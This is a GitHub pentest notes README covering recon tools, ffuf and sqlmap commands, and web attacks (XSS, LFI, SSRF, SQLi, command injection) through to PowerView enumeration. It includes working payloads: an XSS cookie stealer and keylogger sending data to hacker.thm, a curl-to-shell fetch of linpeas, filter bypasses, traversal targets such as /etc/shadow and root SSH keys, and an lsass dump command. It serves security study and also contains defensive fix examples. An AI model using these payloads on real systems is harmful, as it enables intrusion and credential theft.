lcoriolan/Pentest-Resources
Pentest-resources

This document is intended to serve as a working guide to penetration testing resources.

THINGS TO DO

- add red team section
- clean up notes
- add software reverse engineering section
- look into Maldev Academy
- shell command: binwalk
- Splunk advanced queries
- plink - port forwarding attacks


Pentest methodology

5 Stages of hacking

- Reconnaissance
- Scanning and enumeration
- Exploitation
- Maintaining access
- Covering tracks

ANECDOTES

During the pentest of an organization, operators achieved domain admin in 4 hours. Following initial access, the team exploited an outdated machine running Windows Server 2003 using EternalBlue (MS17-010). On this machine the team identified stale credentials that granted access to the Git EA code repository. From there, pentest personnel identified hard-coded credentials for multiple services and escalated privileges using those credentials.

Nmap interactive mode: older Nmap versions (up to 5.21) ship an --interactive mode; if the nmap binary is SUID root or can be run via sudo, typing !sh at the interactive prompt drops a root shell.

Low Hanging Fruit

Default passwords

Cisco devices - cisco:cisco, admin:admin, root:root
iDRAC - root:calvin

Reverse engineering

strace / ltrace - trace the system calls and library calls a binary makes while it runs

Tools

GTFOBins
LOLBAS (LOLBins)
LOLDrivers
KDMapper is a simple tool that exploits a vulnerable Intel driver (iqvw64e.sys) to manually map non-signed drivers in memory
static binaries - https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

C2 frameworks

armitage 
Covenant
Powershell Empire and Starkiller
Sliver 
Havoc 

Web application Penetration Testing checklist:

Contact Form Testing A web application's contact form is a favourite entry point for spammers, so it should be able to identify and prevent spam submissions. Adding a CAPTCHA is one of the easiest ways to limit contact-form spam.

Proxy Server(s) Testing Intercepting proxies such as Burp Proxy and OWASP ZAP sit between the browser and the application so that every request and response can be inspected and modified; route all testing traffic through one. Separately, confirm that any proxy or reverse proxy deployed in front of the application is actually enforcing the filtering it is meant to.

Spam Email Filter Testing Ensure spam filters are functioning properly: verify that they filter incoming and outgoing mail and block unsolicited messages. In other words, check that email security policies are actually being enforced, since phishing by email remains one of the most common ways in.

Network Firewall Testing Make sure the firewall is blocking undesirable traffic to the web application and that the security policies configured on it are actually being enforced. A gap in the firewall is an open invitation to attackers.

Security Vulnerability Testing Carry out a thorough security check on various aspects associated with your web application like servers and other such network devices and make a list of the security vulnerabilities they pose. Then find and implement ways to fix them.

Credential Transport Testing Ensure usernames and passwords are only ever submitted over HTTPS (with HSTS, so the first request cannot be downgraded), so that credentials cannot be captured through man-in-the-middle attacks. Stored passwords should be hashed with a slow, salted algorithm (bcrypt, scrypt or Argon2), not encrypted. The sensitive data your clients submit needs to be as well protected as the application itself.

Cookie Testing Session cookies identify logged-in users, so a leaked cookie compromises that user's account. Check that cookies carry the Secure, HttpOnly and SameSite attributes, that session identifiers are random and regenerated on login, and that no sensitive data is stored in the cookie itself in readable (plain text or merely encoded) form.

Testing For Open Ports Every open port on the host serving the web application is additional attack surface. Scan the server and make sure only the ports the application actually needs (typically 80/443) are exposed; management services such as SSH, RDP and database ports should be firewalled or bound to internal interfaces.

Application Login Page Testing Ensure your web application locks itself up after a specific number of unsuccessful login attempts. This is one of the most basic elements, which, when implemented correctly can go a long way in securing your web application from hackers.

Error Message Testing Ensure all error messages are generic and do not reveal internals (stack traces, SQL errors, file paths) or let an attacker tell which part of a check failed. For example, "Invalid username or password" is fine, but separate messages such as "unknown username" and "wrong password" allow an attacker to enumerate valid usernames.

HTTP Method(s) Testing Review the HTTP methods the application accepts: send an OPTIONS request and read the Allow header, then verify by actually sending each method, since servers do not always report accurately. PUT and DELETE should be disabled unless the application genuinely needs them, and TRACE should be off.
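The cookie and HTTP-method checks above can be run mechanically over captured response headers. The following Python is an added example, not part of the original checklist: the two header sets are constructed (a weak response and a hardened one) so the audit runs offline, and the set of expected methods is an assumption for a typical browser-facing application.

```python
# Constructed sample responses: a weak one and a hardened one.
WEAK_RESPONSE = [
    ("Set-Cookie", "PHPSESSID=1a2b3c; Path=/"),
    ("Allow", "GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS"),
]
HARDENED_RESPONSE = [
    ("Set-Cookie", "PHPSESSID=1a2b3c; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Allow", "GET, HEAD, POST, OPTIONS"),
]

# Methods a typical browser-facing app needs (assumption); anything else in Allow is flagged.
EXPECTED_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}


def parse_set_cookie(value: str):
    """Split 'name=value; Attr; Attr=val' into the cookie name and a dict of
    lower-cased attributes ('' for flag attributes such as Secure)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_cookie(value: str) -> list:
    """Flag a Set-Cookie header that lacks Secure, HttpOnly or a strict SameSite."""
    name, attrs = parse_set_cookie(value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (sent over plain HTTP)")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable from document.cookie)")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict")
    return findings


def audit_allow(value: str) -> list:
    """Flag every method in an Allow header that the application should not expose."""
    methods = {m.strip().upper() for m in value.split(",") if m.strip()}
    return [f"Allow: {m} enabled" for m in sorted(methods - EXPECTED_METHODS)]


def audit_response(headers) -> list:
    """Run both checks over a list of (name, value) response headers."""
    findings = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            findings.extend(audit_cookie(value))
        elif name.lower() == "allow":
            findings.extend(audit_allow(value))
    return findings


if __name__ == "__main__":
    for line in audit_response(WEAK_RESPONSE):
        print(line)
```

Capture the headers with `curl -X OPTIONS -i <url>` (or from Burp) and feed them in as (name, value) pairs. The Allow header is only the server's claim; confirm each flagged method by sending it and checking the status code.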

Username and Password Testing Test all the usernames/passwords that are used on your web application. Passwords should be fairly complex and usernames should not be easily guessable. Separate such weak usernames and passwords and alert those users to change them.

File Upload Testing Ensure files uploaded to the application are scanned before they are stored, that type and size are validated server-side (not just by extension or Content-Type), and that uploads are kept outside the web root so an uploaded script can never be executed.

Web application testing tools

goWitness - take screenshots of pages
DirBuster - GUI directory buster
Steghide - detect and extract steganographic data hidden in images
Infoga - gathers email account information (IP, hostname, country, ...) from public sources
assetfinder - enumerate subdomains

Tool Links

PSMAPEXEC -- https://github.com/The-Viper-One/PsMapExec
AMNESIAC -- https://github.com/Leo4j/Amnesiac

Tool Commands

ffuf - username enumeration via a signup form:
ffuf -w <wordlist> -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/signup -mr "username already exists"
-w selects the wordlist, -X the request method, -H adds a header, -u the URL being requested, and -mr matches responses containing the given text (here the message confirming that a username already exists, which validates the guess).

ffuf -w THMfuff:W1,SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/login -fc 200
Two wordlists are passed to -w, separated by a comma, each tagged with a keyword: W1 for the list of valid usernames and W2 for the passwords to try. -fc 200 filters out every response with status 200 (the failed-login page), so anything left is a probable valid login.

curl 'http://10.10.19.84/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

curl -L https://<10.10.10.10>/linpeas.sh | sh   # fetch and run directly from memory; nothing is written to disk on the target

Sqlmap-

WGET

gobuster 
	gobuster dir -u http://10.10.151.33 -w SecLists/Discovery/Web-Content/directory-list-1.0.txt

Searchsploit 
	Exploits indexed by searchsploit live locally at /usr/share/exploitdb/exploits/

Testing For XSS

You'll need to test every possible point of entry; these include:

Parameters in the URL Query String

URL File Path

Sometimes HTTP Headers (although unlikely exploitable in practice)

How to test for Stored XSS:

Examples of entry points could be:

Comments on a blog

User profile information

Website listings

DOM Based XSS:

is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.

DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "window.location.x" parameters.

When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval().

How to test for Blind XSS:

When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.

A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.

XSS Payloads

Basic PoC: <script>alert('XSS');</script>
Session stealer: <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key logger: <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Escaping an input tag: when the reflection lands inside an input's value attribute, close the attribute and the tag before the payload: "><script>alert('THM');</script>. The important part is the "> which closes the value attribute and then the input tag.
Escaping a textarea: the textarea element itself has to be closed rather than an attribute: </textarea><script>alert('THM');</script>
Escaping an existing JavaScript string: ';alert('THM');//  The ' closes the string that holds your input, ; ends the current statement, and // turns whatever follows into a comment instead of executable code.
When the word script is removed from your payload, a filter is stripping out potentially dangerous words. If it strips them in a single pass, nest the word inside itself: <sscriptcript>alert('THM');</sscriptcript>. Removing the inner "script" once leaves <script>alert('THM');</script>, which then runs and pops an alert with the string THM.
If < and > are filtered out you cannot close the IMG tag, but you can still add attributes to it. The onload event executes once the image in src has loaded, so a payload of /images/cat.jpg" onload="alert('THM'); closes the src attribute and adds an onload handler; view the page source to confirm the resulting markup.
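The two filter bypasses above (single-pass word stripping defeated by nesting, and angle-bracket stripping defeated by attribute injection) modelled in Python, with the correct fix beside them. This is an added example, not part of the original notes: the filter functions are hypothetical reconstructions of the filters described, and the payloads are the ones given above.

```python
import html
import re

# Payloads from the notes above, reproduced as constructed test inputs.
NESTED_PAYLOAD = "<sscriptcript>alert('THM');</sscriptcript>"
IMG_PAYLOAD = "/images/cat.jpg\" onload=\"alert('THM');"


def strip_word_once(payload: str) -> str:
    """Single-pass blocklist filter: deletes every 'script' it can see but never
    re-scans the result, so the nested 'sscriptcript' collapses to 'script'."""
    return payload.replace("script", "")


def strip_word_recursive(payload: str) -> str:
    """Repeat the deletion until nothing changes. This defeats the nesting trick,
    but it is still only a blocklist; it is here to show why the single pass fails."""
    previous = None
    while previous != payload:
        previous = payload
        payload = re.sub(r"script", "", payload, flags=re.IGNORECASE)
    return payload


def strip_angle_brackets(payload: str) -> str:
    """Filter that removes < and > so no new tag can be opened."""
    return payload.replace("<", "").replace(">", "")


def render_img_filtered(src: str) -> str:
    """Reflects the bracket-stripped value into an attribute without encoding
    quotes, so a double quote in the value ends the attribute and adds onload=."""
    return f'<img src="{strip_angle_brackets(src)}">'


def render_img_encoded(src: str) -> str:
    """The real fix: attribute-context output encoding. html.escape(quote=True)
    turns " into &quot; so the value can never terminate the attribute."""
    return f'<img src="{html.escape(src, quote=True)}">'


def breaks_out_of_attribute(markup: str) -> bool:
    """True when the rendered tag contains more than the two delimiting quotes."""
    return markup.count('"') > 2


if __name__ == "__main__":
    print(strip_word_once(NESTED_PAYLOAD))        # the filter hands back <script>...
    print(render_img_filtered(IMG_PAYLOAD))       # onload= lands outside the src value
    print(render_img_encoded(IMG_PAYLOAD))        # quotes encoded, attribute intact
```

The lesson the two filters share: removing "bad" substrings is not a defence, because the output of the filter is itself attacker-influenced. Encoding for the context the value lands in (HTML body, attribute, JavaScript string, URL) is what actually closes the hole.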

Other payloads:

Popups: <script>alert("Hello World")</script> - creates a Hello World popup in the user's browser. Context-breaking variants: ;alert(4)  and  ";alert('XSS');//
Writing HTML (document.write) - overwrite the page's HTML with your own (effectively defacing the whole page).
XSS keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - logs every keystroke, capturing passwords and anything else the user types into the page.
Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - a mini local port scanner run from the victim's browser (covered further in the TryHackMe XSS room).
Example of a payload injected through a redirect parameter: https://example.com/urlmessages/leavingTAC.php?destination=https://cnn.com%22%3E%3Cscript%3Ealert(4)%3C/script%3E

Directory traversal // important directories

Below are some common OS files you could use when testing for directory traversal .

/etc/issue - contains a message or system identification to be printed before the login prompt.

/etc/profile - controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived

/proc/version - specifies the version of the Linux kernel

/etc/passwd - lists all registered users that have access to the system

/etc/shadow - contains information about the system's users' passwords

/root/.bash_history - contains the history commands for root user

/var/log/dmesg - contains global system messages, including those logged during system startup

/var/mail/root - all emails for root user

/root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server

/var/log/apache2/access.log - the accessed requests for Apache  webserver

C:\boot.ini - contains the boot options for computers with BIOS firmware

Other tools

Cyberchef - is a Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Crackstation - web hosted tool to crack weak hashes 

File Inclusion

In PHP, functions such as include, require, include_once and require_once are the usual sinks in file inclusion vulnerabilities. LFI also occurs in other languages such as ASP, JSP and Node.js.

Null byte injection appends a URL-encoded null byte (%00, 0x00 in hex) to user-supplied data so that the underlying C string is terminated early. Think of it as tricking the web app into ignoring everything that comes after the null byte.

By adding the Null Byte at the end of the payload, we tell the  include function to ignore anything after the null byte which may look like:

include("languages/../../../../../etc/passwd%00" . ".php"); which behaves like → include("languages/../../../../../etc/passwd");

NOTE: the %00 trick was fixed in PHP 5.3.4 and does not work on that version or later. Where the application appends an extension, another option that has been reported to work in some setups is the current-directory trick: end the payload with /. so the appended extension is not applied to the file you want.

If the warning message for include(languages/etc/passwd) shows that the ../ has vanished, the web application is replacing ../ with an empty string. Because the replacement runs only once, a payload such as ....//....//....//....//....//etc/passwd survives it: removing the inner ../ from each ....// leaves exactly ../.

if the web application asks to supply input that has to include a directory such as: http://webapp.thm/index.php?lang=languages/EN.php then, to exploit this, we need to include the directory in the payload like so: ?lang=languages/../../../../../etc/passwd.			
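The single-pass ../ filter, its ....// bypass and the directory-prefix case above, modelled in Python beside a resolution that actually holds. This is an added example, not code from the original notes or from the target application: BASE_DIR is a hypothetical web-root subdirectory standing in for the app's languages/ folder, and the filter is a reconstruction of the one described.

```python
import os

# Hypothetical directory the app includes files from (stands in for languages/).
BASE_DIR = "/var/www/app/languages"


def filter_dotdot_once(user_path: str) -> str:
    """The filter described above: delete every '../' in a single pass.
    '....//' contains one '../' in the middle; removing it leaves '../'."""
    return user_path.replace("../", "")


def include_filtered(user_path: str) -> str:
    """Vulnerable resolution: filter the string, then join under BASE_DIR.
    The filter output is trusted, so the surviving '../' sequences still
    climb out of BASE_DIR when the path is normalised."""
    return os.path.normpath(os.path.join(BASE_DIR, filter_dotdot_once(user_path)))


def include_safe(user_path: str) -> str:
    """Hardened resolution: normalise first, then refuse anything whose
    canonical form is not inside BASE_DIR. No string filtering is involved, so
    there is nothing to bypass. os.path.normpath is string-only; on a real
    filesystem use os.path.realpath so a symlink inside BASE_DIR cannot point
    back out of it."""
    candidate = os.path.normpath(os.path.join(BASE_DIR, user_path))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"path escapes {BASE_DIR}: {user_path!r}")
    return candidate


def escapes_base(user_path: str) -> bool:
    """Convenience wrapper: does the hardened resolver reject this input?"""
    try:
        include_safe(user_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    bypass = "....//....//....//....//....//etc/passwd"
    print(filter_dotdot_once(bypass))   # ../../../../../etc/passwd
    print(include_filtered(bypass))     # /etc/passwd
    print(escapes_base("languages/../../../../../etc/passwd"))  # True
```

The same check covers the case where the parameter must start with a directory name (?lang=languages/../../../../../etc/passwd): the prefix changes nothing once the path is normalised and compared against the allowed root.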

RFI requires allow_url_fopen to be On and, for include()/require() of a remote URL, allow_url_include to be On as well (it is Off by default since PHP 5.2).

Steps for testing for LFI

Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!

Enter a valid input to see how the web server behaves.

Enter invalid inputs, including special characters and common file names.

Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.

Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.

Understand the input validation and if there are any filters!

Try the inject a valid entry to read sensitive files

Sample curl syntax: curl -X POST http://10.10.56.253/challenges/chall1.php -d 'method=GET&file=/etc/flag1'   (add -o <file> to save the response to disk)

SSRF

Directory traversal (../) can be used in SSRF: when the application appends a fixed path to a URL you partly control, ../ lets you back out of that path and make the server request a different endpoint.

&x= is used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string.

Potential SSRF vulnerabilities can be spotted in web applications When a full URL is used in a parameter in the address bar, A hidden field in a form, A partial URL such as just the hostname, Or perhaps only the path of the URL. this is where a lot of trial and error will be required to find a working payload.

If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.

in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.
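The deny-list bypasses above (127.1, 2130706433, 017700000001, 0, 0.0.0.0 and the metadata address) come down to one thing: the deny list compares spellings while the HTTP client's resolver compares addresses. The following Python is an added example, not part of the original notes, showing a string deny list next to a check that canonicalises the literal first. The resolver behaviour relied on is socket.inet_aton, which accepts the same shorthand forms the C library does; hostnames are deliberately left to the caller because they need live DNS.

```python
import ipaddress
import socket

METADATA_IP = ipaddress.ip_address("169.254.169.254")


def naive_is_blocked(host: str) -> bool:
    """String deny list as described above; only the exact spellings are caught."""
    return host.lower() in {"localhost", "127.0.0.1", "169.254.169.254"}


def literal_to_ip(host: str):
    """Canonicalise any IP literal the platform resolver would accept.

    ipaddress only takes dotted-quad / RFC 4291 text, so fall back to
    socket.inet_aton, which (like the libc most HTTP clients use) also accepts
    127.1, 0, 2130706433, 017700000001 and 0x7f000001. Returns None for a
    hostname, which needs DNS and is out of scope for this offline example.
    """
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def hardened_is_blocked(host: str):
    """Decide on the canonical address, not the spelling.

    Returns True/False for IP literals and None for hostnames. A hostname must be
    resolved (socket.getaddrinfo) and every returned address checked the same way,
    and the check has to apply to the address the connection actually uses,
    otherwise a rebinding DNS record or 127.0.0.1.nip.io walks straight past it.
    """
    ip = literal_to_ip(host)
    if ip is None:
        return None
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast
            or ip == METADATA_IP)


if __name__ == "__main__":
    for probe in ["127.0.0.1", "127.1", "2130706433", "017700000001", "0", "[::1]",
                  "169.254.169.254", "8.8.8.8", "127.0.0.1.nip.io"]:
        print(f"{probe:18} naive={naive_is_blocked(probe)!s:5} hardened={hardened_is_blocked(probe)}")
```

On the defensive side this is why "block 169.254.169.254" alone is weak for cloud metadata: IMDSv2-style session tokens or a metadata-endpoint firewall rule at the network layer catch the DNS-pointing-to-metadata trick that a URL filter cannot.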


SQLI

Typical payloads to enter into a field that gets concatenated into a SQL query:
' OR 1=1;--
'or 1=1--
test' OR 1=1; --
blah' or 1=1--    (unauthenticated login)
|| or + are used to concatenate strings, depending on the database.

The character ' closes the string literal in the SQL query. OR returns true if either side of it is true; as 1=1 is always true, the whole WHERE clause is true, so the server treats the email as valid and logs us in as the first matching row (in the example, user id 0, which happens to be the administrator account). The -- sequence starts a SQL comment, so any remaining conditions on the login (such as the password check) are ignored. This is like # in Python and // in JavaScript.
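The login bypass described above, run end to end against an in-memory SQLite database. This is an added Python example, not code from the original notes: the users table and its rows are constructed, the passwords are stored in plaintext only so the effect of the injected query is visible, and the parameterised version beside it is the fix.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory table with constructed rows. Plaintext passwords are used only
    so the demo is readable; real applications store salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(0, "admin@example.com", "S3cretAdminPw"), (1, "alice@example.com", "alicepw")],
    )
    return conn


def login_vulnerable(conn, email: str, password: str):
    """User input spliced into the SQL text. With email = "' OR 1=1--" the query
    becomes  ... WHERE email = '' OR 1=1--' AND password = '...'
    so the password check is commented out and the first row (id 0) comes back."""
    query = (
        "SELECT id, email FROM users "
        f"WHERE email = '{email}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_parameterised(conn, email: str, password: str):
    """The fix: bound parameters. The driver hands the values to SQLite separately
    from the query text, so quotes and comment markers in them are just data."""
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()


if __name__ == "__main__":
    db = build_db()
    payload = "' OR 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))      # (0, 'admin@example.com')
    print("parameterised:", login_parameterised(db, payload, "anything"))  # None
```

The same payload against the parameterised query simply looks for a user whose email address is literally the string ' OR 1=1-- and finds nothing.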

Sqlmap command

sqlmap -u "http://gml.sample.org/grad/neubrew/BFileCommentsOutput.jsp?brewer=&comment=&type=*"   # the * marks the injection point; without it sqlmap tests every parameter

Command injection

Shell operators ;, & and && combine two (or more) commands on one line so that both execute: ; always runs the next command, && runs it only if the previous one succeeded, & runs the first in the background. | pipes the output of one command into the next.

Command injection can be detected in two ways. Blind or Verbose

For blind injection, sleep and ping are useful test payloads because they introduce a measurable delay. With ping, the application hangs for roughly as many seconds as the number of pings you request (for example ping -c 5 127.0.0.1); with sleep 5 it hangs for 5 seconds.

For blind injection forcing some output. This can be done by using redirection operators such as >.For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file’s contents.

curl command is a great way to test for command injection.

Verbose command injection is when the application gives you feedback or output as to what is happening or being executed.For example, the output of commands such as ping or whoami is directly displayed on the web application.

In PHP, several functions run commands through the system shell: exec, passthru, system, shell_exec, popen, proc_open and the backtick operator.
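The pattern behind every one of those sinks is the same: untrusted input concatenated into a command line that a shell then parses, so the operators above become command separators. The following Python is an added example, not code from the original notes, showing that pattern next to its fix. echo stands in for ping so it runs without network access, the hostname allowlist is an assumption for this demo, and it assumes a POSIX /bin/sh (cmd.exe uses & rather than ; as the separator).

```python
import re
import subprocess

# Allowlist for what a "host" may look like: hostnames or dotted IPv4 only (assumption).
HOST_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")


def ping_vulnerable(host: str) -> str:
    """Input pasted into a shell command string and run with shell=True, which is
    what PHP's exec()/system() do with a string. `echo` replaces `ping` here so the
    demo needs no network, but the injection works identically."""
    completed = subprocess.run(
        f"echo pinging {host}", shell=True, capture_output=True, text=True
    )
    return completed.stdout


def ping_hardened(host: str) -> str:
    """The fix: validate against an allowlist, then pass an argv list with no shell.
    The host is a single argument, so ; && | $() and backticks are never
    interpreted, and the regex refuses them before a process is even started."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    completed = subprocess.run(
        ["echo", "pinging", host], capture_output=True, text=True
    )
    return completed.stdout


def hardened_rejects(host: str) -> bool:
    """Convenience wrapper: does the hardened version refuse this input?"""
    try:
        ping_hardened(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(ping_vulnerable("127.0.0.1; echo INJECTED"), end="")   # second line: INJECTED
    print(ping_vulnerable("127.0.0.1 | echo INJECTED"), end="")  # only INJECTED
    print(ping_hardened("127.0.0.1"), end="")                     # pinging 127.0.0.1
    print(hardened_rejects("127.0.0.1; echo INJECTED"))           # True
```

For blind testing, the same vulnerable function with host = "127.0.0.1; sleep 5" is the time-based probe from above: measure the response time rather than reading output.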

Command injection payload cheat sheet.

Sysinternals

a suite of utilities for managing, diagnosing, troubleshooting, and monitoring  environments

Microsoft offers Sysinternals Live, a service that allows you to execute Sysinternals tools directly from the web without downloading them. You can run a tool from Sysinternals Live by typing \\live.sysinternals.com\tools\<toolname> in the Run dialog box (Win+R) or in the Command Prompt.
Process Explorer (procexp.exe): An advanced version of Task Manager that provides detailed information about processes and their dependencies.

Autoruns (autoruns.exe): Shows you what programs are configured to run during system boot-up or login, and the order in which they are launched.

Process Monitor (procmon.exe): A monitoring tool that shows real-time file system, Registry, and process/thread activity.
	When using Procmon to examine a process, look for vectors that could be abused, for example:
		- Process Create events
  			- check for processes spawned via an unqualified or relative path (no full path given); an attacker who can plant a binary earlier in the search order can hijack or proxy that code execution.

TCPView (tcpview.exe): Displays all active TCP and UDP endpoints on your system, including the owning process.

BgInfo (bginfo.exe): Automatically displays relevant information about a Windows computer on the desktop's background.

Sysmon (sysmon.exe): Monitors and reports key system activity via the Windows event log, useful for security and forensic analysis.

AccessChk (accesschk.exe): This utility reports the effective permissions for files, registry keys, services, processes, kernel objects, and more.

Disk2vhd (disk2vhd.exe): Creates a Virtual Hard Disk (VHD) version of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines.

PsTools Suite: A set of command-line tools for managing local and remote systems, including pslist, pskill, psexec, and others.

RegJump (regjump.exe): Jump directly to a specific registry key in Regedit.

VMMap (vmmap.exe): Provides a detailed graphical representation of the memory usage of a process.

RAMMap (rammap.exe): An advanced physical memory usage analysis utility.

#LIVING OFF THE LAND WINDOWS ++
Task Scheduler - inspect or tamper with scheduled tasks - taskschd.msc
Registry Editor - analyse registry keys - regedit.exe
Active Directory Users and Computers (ADUC) - search and enumerate users and groups
Procdump - create a memory dump of lsass - procdump.exe -ma lsass.exe

Important windows file locations

Powershell - C:\Windows\System32\WindowsPowershell\v1.0\

Powershell tools

PowerView - https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/README.md

Powershell/Windows commands

Get-HostIP                      -   resolves a hostname to an IP
Check-Write                     -   checks if the current user can write to the specified file
Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)
Invoke-CopyFile                 -   copies a local file to a remote location, matching MAC properties
Test-Server                     -   tests connectivity to a specified server
Get-UserProperties              -   returns all properties specified for users, or a set of user:prop names
Get-ComputerProperties          -   returns all properties specified for computers, or a set of computer:prop names
Get-LastLoggedOn                -   return the last logged on user for a target host
Get-UserLogonEvents             -   returns logon events from the event log for a specified host
Get-UserTGTEvents               -   returns TGT request events for a specified host
Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host
Invoke-SearchFiles              -   search a local or remote path for files with specific terms in the name
Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest                   -   gets the forest associated with the current user's domain
Get-NetForestDomains            -   gets all domains for the current forest
Get-NetDomainControllers        -   gets the domain controllers for the current computer's domain
Get-NetCurrentUser              -   gets the current [domain\\]username
Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs                 -   gets all user ServicePrincipalNames
Get-NetOUs                      -   gets data for domain organization units
Invoke-NetUserAdd               -   adds a local or domain user
Get-NetGroups                   -   gets a list of all current groups in the domain
Get-NetGroup                    -   gets data for each user in a specified domain group
Get-NetLocalGroups              -   gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices            -   gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd          -   adds a user to a specified local or domain group
Get-NetComputers                -   gets a list of all current servers in the domain
Get-NetFileServers              -   get a list of file servers used by current domain users
Get-NetShare                    -   gets share information for a specified server
Get-NetLoggedon                 -   gets users actively logged onto a specified server
Get-NetSessions                 -   gets active sessions on a specified server
Get-NetFileSessions             -   returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections              -   gets active connections to a specific server resource (share)
Get-NetFiles                    -   gets open files on a server
Get-NetProcesses                -   gets the remote processes and owners on a remote server
Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-UserHunterThreaded       -   threaded version of Invoke-UserHunter
Invoke-StealthUserHunter        -   finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users
Invoke-UserProcessHunter        -   hunts for processes on domain machines running under specific target user accounts
Invoke-ProcessHunter            -   hunts for processes with a specific name on domain machines
Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs
Get-NetDomainTrusts             -   gets all trusts for the current user's domain
Get-NetDomainTrustsLDAP         -   gets all trusts for the current user's domain using just LDAP queries. This is less accurate than Get-NetDomainTrusts but allows you to relay all traffic through your primary DC.
Get-NetForestTrusts             -   gets all trusts for the forest associated with the current user's domain
Invoke-FindUserTrustGroups      -   enumerates users who are in groups outside of their principal domain
Invoke-FindAllUserTrustGroups   -   map all domain trusts and enumerate all users who are in groups outside  of their principal domain
Invoke-MapDomainTrusts          -   try to build a relational mapping of all domain trusts
Invoke-MapDomainTrustsLDAP      -   try to build a relational mapping of all domain trusts using Get-NetDomainTrustsLDAP
Invoke-Netview                  -   a port of @mubix's netview.exe tool using Get-Net* functionality finds all machines on the local domain and runs various enumeration methods on what it finds
Invoke-NetviewThreaded          -   threaded version of Invoke-NetView
Invoke-UserView                 -   returns parsable session/loggedon user data for a given domain
Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-ShareFinderThreaded      -   threaded version of Invoke-ShareFinder
Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain
Invoke-FileFinderThreaded       -   threaded version of Invoke-FileFinder
